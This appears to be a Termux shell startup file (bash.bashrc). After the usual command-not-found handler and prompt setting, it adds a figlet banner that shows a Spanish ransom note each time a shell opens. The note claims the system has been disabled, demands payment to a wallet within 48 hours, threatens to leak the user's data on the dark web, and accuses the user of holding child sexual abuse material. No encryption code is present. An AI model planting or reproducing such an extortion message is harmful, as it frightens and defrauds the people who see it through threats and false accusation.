if [ -x /data/data/com.termux/files/usr/libexec/termux/command-not-found ]; then
        command_not_found_handle() {
                /data/data/com.termux/files/usr/libexec/termux/command-not-found "$1"
        }
fi

PS1='\$ '

echo "==================================================================================================================================="

figlet -t -k -c Te preguntaras que ha pasado? Te he dejado inutil tu sistema, tienes que pagar a esta wallet si quieres recuperarlo, si no pagas en el plazo de 48 horas, toda tu informacion se filtrara en la DarkWeb. Asi aprenderas a  no almacenar pornografia infantil en tu ordenador.

echo "==================================================================================================================================="
